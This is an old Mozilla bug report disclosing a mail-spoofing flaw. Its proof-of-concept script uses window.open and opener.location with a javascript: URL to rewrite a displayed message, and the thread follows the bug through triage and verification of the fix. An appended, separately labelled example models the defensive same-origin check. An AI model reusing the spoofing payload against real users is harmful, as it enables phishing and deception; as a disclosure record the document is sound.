Spoofing email messages

VERIFIED FIXED in M17

Status

P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: security-bugs)

Tracking

Trunk
x86
Windows 95

Details

(Whiteboard: [nsbeta2+], URL)

Attachments

(1 attachment)

(Reporter)

Description

19 years ago
It is possible to spoof email messages by manipulating the location object of
the currently displayed message. This is done by opening a window which does:
opener.location='javascript:s="<H1>Spoofed</H1>"'
The code that must be included in HTML message is:
-------------------------------------------
<SCRIPT>
a=window.open("ht"+"tp://www.nat.bg/~joro/mozilla/openlocation.html");
</SCRIPT>
-------------------------------------------

-----"http://www.nat.bg/~joro/mozilla/openlocation.html"------
<SCRIPT>
setTimeout("opener.location='javascript:s=\"<H1>Spoofed</H1>\"'; ",6000);
// It would be better to use setInterval(), but Mozilla crashes on my box in
// this case
</SCRIPT>
--------------------------------------------------------------

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General

Updated

19 years ago
Keywords: beta2

Comment 2

19 years ago
Branch time for M15 has come... and so I'm moving this to M16 (Norris is out 
this week).
Target Milestone: M15 → M16

Updated

19 years ago
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
This looks directly related to 37907. The fix is probably the same. I will
verify that the sameOrigin check is being done.
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED

Comment 5

19 years ago
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]

Comment 6

19 years ago
Changed QA contact to Cathy.
QA Contact: junruh → czhang
Created attachment 9041
Proposed Patch - Needs Review
argh...disregard that patch...posted to the wrong bug.

Comment 9

19 years ago
It is not fixed yet.
http://cathyz/bugs/23516.html
This page opens a window in another domain, http://cathyz2/bugs/1.html;
23516.html is spoofed by script in 1.html. Same origin is not checked here, I
guess.
Status: ASSIGNED → NEW
Moving to M17. Not an M16 stopper.
Target Milestone: M16 → M17

Comment 11

19 years ago
Assigning QA to czhang
Marking Confidential as per jar. jtaylor is attempting to reproduce this bug.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
I think this one is also dependent on 28443. jtaylor, can you confirm that this
one is fixed as of 7/6?
Depends on: 28443

Comment 14

19 years ago
Looks fixed with 2000070608 build.
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Comment 16

19 years ago
verified, no spoofing
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
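
The same-origin check the comments above refer to, modelled as an added example (not Mozilla's code and not part of the original bug report): the decision a browser has to make when script in one window sets another window's location. The function name, parameters and return shape are hypothetical; the host names are the ones from comment 9.

```javascript
// Added example: a model of the check, not Mozilla's implementation.
// decideOpenerNavigation and its parameter names are hypothetical.
//   callerUrl    - URL of the document whose script sets the location
//   targetDocUrl - URL of the document currently shown in the target window
//   newLocation  - the string being assigned to target.location
function decideOpenerNavigation(callerUrl, targetDocUrl, newLocation) {
  let dest, callerOrigin, targetOrigin;
  try {
    // The URL parser strips surrounding whitespace, removes embedded tabs and
    // newlines and lowercases the scheme, so " JaVa\tScript:" is still caught.
    dest = new URL(newLocation, callerUrl);
    callerOrigin = new URL(callerUrl).origin;
    targetOrigin = new URL(targetDocUrl).origin;
  } catch (e) {
    return { allow: false, reason: "unparseable URL" };
  }

  if (dest.protocol !== "javascript:") {
    // Ordinary navigation: the window loads a new document under the
    // destination's own origin; nothing runs inside the old document.
    return { allow: true, reason: "ordinary navigation" };
  }

  // A javascript: URL is evaluated in the target's current document, so the
  // caller must share that document's origin. Opaque origins serialize as
  // "null" and are treated here as matching nothing (conservative choice).
  if (callerOrigin === "null" || targetOrigin === "null" ||
      callerOrigin !== targetOrigin) {
    return { allow: false, reason: "cross-origin javascript: URL" };
  }
  return { allow: true, reason: "same-origin javascript: URL" };
}

// Constructed demo using the hosts from comment 9 and the string from the
// description: 1.html on cathyz2 tries to rewrite 23516.html on cathyz.
console.log(decideOpenerNavigation(
  "http://cathyz2/bugs/1.html",
  "http://cathyz/bugs/23516.html",
  'javascript:s="<H1>Spoofed</H1>"'
));
```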